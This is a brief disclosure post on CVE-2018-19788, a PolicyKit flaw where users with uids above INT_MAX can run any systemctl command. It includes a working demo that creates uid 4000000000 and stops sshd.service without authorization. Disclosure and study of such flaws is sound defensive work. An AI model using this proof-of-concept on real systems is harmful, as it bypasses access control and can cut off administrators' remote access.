Critical vulnerability on policykit of systemd

[CVE-2018-19788]: A flaw was found in PolicyKit (aka polkit 0.115) that allows a user with a uid greater than INT_MAX to successfully execute any systemctl command.

Find out more about CVE-2018-19788 from the MITRE CVE dictionary and NIST NVD

Demo

[email protected]:~# useradd -u 4000000000 wtf
[email protected]:~# su - wtf
No directory, logging in with HOME=/

$ whoami
wtf
$ id
uid=4000000000(wtf) gid=1002(wtf) groups=1002(wtf)

$ systemctl stop sshd.service

(process:22860): GLib-GObject-WARNING **: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
**
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)

[email protected]:~# systemctl status sshd.service
...
Dec 05 15:38:39 ahihi systemd[1]: Stopping OpenBSD Secure Shell server...
Dec 05 15:38:39 ahihi systemd[1]: Stopped OpenBSD Secure Shell server.